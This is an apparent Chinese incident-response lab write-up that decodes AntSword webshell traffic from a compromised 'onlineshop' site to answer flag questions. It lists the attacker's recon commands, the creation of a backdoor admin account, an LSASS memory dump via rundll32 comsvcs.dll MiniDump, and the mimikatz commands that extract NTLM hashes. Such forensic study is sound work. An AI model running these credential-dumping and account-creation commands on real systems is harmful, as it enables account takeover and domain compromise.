第六章-流量特征分析-蚂蚁爱上树

N1Rvana included in 应急响应

2024-06-05 About 300 words 2 minutes - views

Contents

0x00 环境分析

1
2
3


1. 管理员Admin账号的密码是什么？  
2. LSASS.exe的程序进程ID是多少？  
3. 用户WIN101的密码是什么?  

0x01

/onlineshop/product2.php蚁剑马，对流量进行解密

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /priv&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain admins" /domain&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]  
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators admin /add&echo [S]&cd&echo [E]  

1、管理员Admin账号的密码是什么？
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]
根据上面流量，得到是Password1
flag{Password1}
2、LSASS.exe的程序进程ID是多少？
解密流量得到
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
https://zhuanlan.zhihu.com/p/346022067
其中
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump pid lsass.dmp full"
flag{852}
3、用户WIN101的密码是什么?
下载上面得到的lsass进程
在这里进行了文件读取的操作，将回显下载下来
选择原始数据进行导出
删除前面多余的字符便是正常的 dmp 文件
利用mimikatz进行解密
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


SID               : S-1-5-21-3374851086-947483859-3378876003-1103  
        msv :  
         [00000003] Primary  
         * Username : win101  
         * Domain   : VULNTARGET  
         * NTLM     : 282d975e35846022476068ab5a3d72df  
         * SHA1     : bc9ecca8d006d8152bd51db558221a0540c9d604  
         * DPAPI    : 8d6103509e746ac0ed9641f7c21d7cf7  
        tspkg :  
        wdigest :  
         * Username : win101  
         * Domain   : VULNTARGET  
         * Password : (null)  
        kerberos :  
         * Username : win101  
         * Domain   : VULNTARGET.COM  
         * Password : (null)  
        ssp :  
        credman :  
        cloudap :  
  
Authentication Id : 0 ; 995 (00000000:000003e3)  
Session           : Service from 0  
User Name         : IUSR  
Domain            : NT AUTHORITY  
Logon Server      : (null)  
Logon Time        : 2023/10/19 11:26:36  
SID               : S-1-5-17  

解密一下NTLM
得到密码
flag{admin#123}